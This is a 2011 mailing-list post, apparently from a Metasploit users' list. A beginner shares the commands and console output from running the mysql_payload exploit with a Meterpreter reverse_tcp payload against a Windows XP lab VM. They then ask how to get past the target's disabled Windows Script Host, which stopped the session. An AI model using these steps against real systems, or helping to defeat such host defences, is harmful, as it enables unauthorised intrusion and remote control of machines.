mailing list archives
payload meet wsh failure?
From: Linan Wang <wang.linan () gmail com>
Date: Wed, 8 Jun 2011 22:17:10 +0100
I have played with the mysql_payload exploit for a full day but got to this
... the exploit successfully uploaded a file and defined a mysql udf, which
enabled next step payload deliver
... no matter what payload i choose, no session was created. I look into the
target machine's even log, it reported Failure Audit: Attempt to execute
Windows Script Host while it is disabled. I guess there is advanced someway
to manipulate the payload. (yes, it's my 1 day with msf)
set RHOST 192.168.1.67
set PASSWORD 123456
set PAYLOAD windows/meterpreter/reverse_tcp
[*] Started reverse handler on 192.168.1.2:4444
[*] Checking target architecture...
[*] Checking for sys_exec()...
[*] sys_exec() already available, using that (override with
[*] Command Stager progress - 1.47% done (1499/102246 bytes)
[*] Command Stager progress - 2.93% done (2998/102246 bytes)
[*] Command Stager progress - 98.19% done (100400/102246 bytes)
[*] Command Stager progress - 99.59% done (101827/102246 bytes)
[*] Command Stager progress - 100.00% done (102246/102246 bytes)
[*] Exploit completed, but no session was created.
the target is a clean windows xp vm without any anti-virus installed.
any suggestion? thx
- payload meet wsh failure? Linan Wang (Jun 08)